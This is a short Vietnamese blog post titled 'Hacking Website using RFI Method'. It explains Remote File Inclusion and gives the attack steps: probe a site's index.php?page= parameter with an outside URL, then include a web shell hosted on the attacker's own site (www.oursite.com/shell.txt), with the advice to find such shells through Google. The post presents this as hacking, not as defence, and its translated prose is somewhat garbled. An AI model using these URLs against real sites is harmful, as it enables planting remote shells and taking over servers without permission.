Hiển thị các bài đăng có nhãn Method. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Method. Hiển thị tất cả bài đăng

Hacking Website using RFI Method

RFI là gì (Remote File Inclusion)
Remote File Inclusion (RFI) là một loại tổn thương thường thấy nhất trên các trang web. Nó cho phép kẻ tấn công bao gồm một tập tin từ xa, thường là thông qua một kịch bản trên máy chủ web. Dễ bị tổn thương xảy ra do việc sử dụng của người dùng cung cấp đầu vào mà không xác nhận thích hợp. Điều này có thể dẫn đến một cái gì đó như tối thiểu như xuất ra các nội dung của tập tin, nhưng tùy thuộc vào mức độ nghiêm trọng, để liệt kê một vài có thể dẫn đến:

* thực hiện trên web
* thực hiện trên phía máy khách như JavaScript có thể dẫn đến các cuộc tấn công khác như cross site scripting (XSS).
* Từ chối dịch vụ (DoS)
* Dữ liệu Theft / ManipulationRFI một lỗ hổng rất phổ biến do các bản vá lỗi và cập nhật trên các trang web quá nhiều.

Bây giờ để kiểm tra xem trang web xem có lỗi hay không để RFI sẽ trả về các lệnh sau đây
Victim chỉ là demo thôi nhé
*www.site.com/index.php?page=www.google.com*
Nếu trang web trả về google thì trang web đó bị lỗi

*/ Cần phải chuẩn bị một code shell .txt lên google search sẽ rất nhiều

*www.site.com/index.php?page=**www.oursite.com/shell.txt*

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương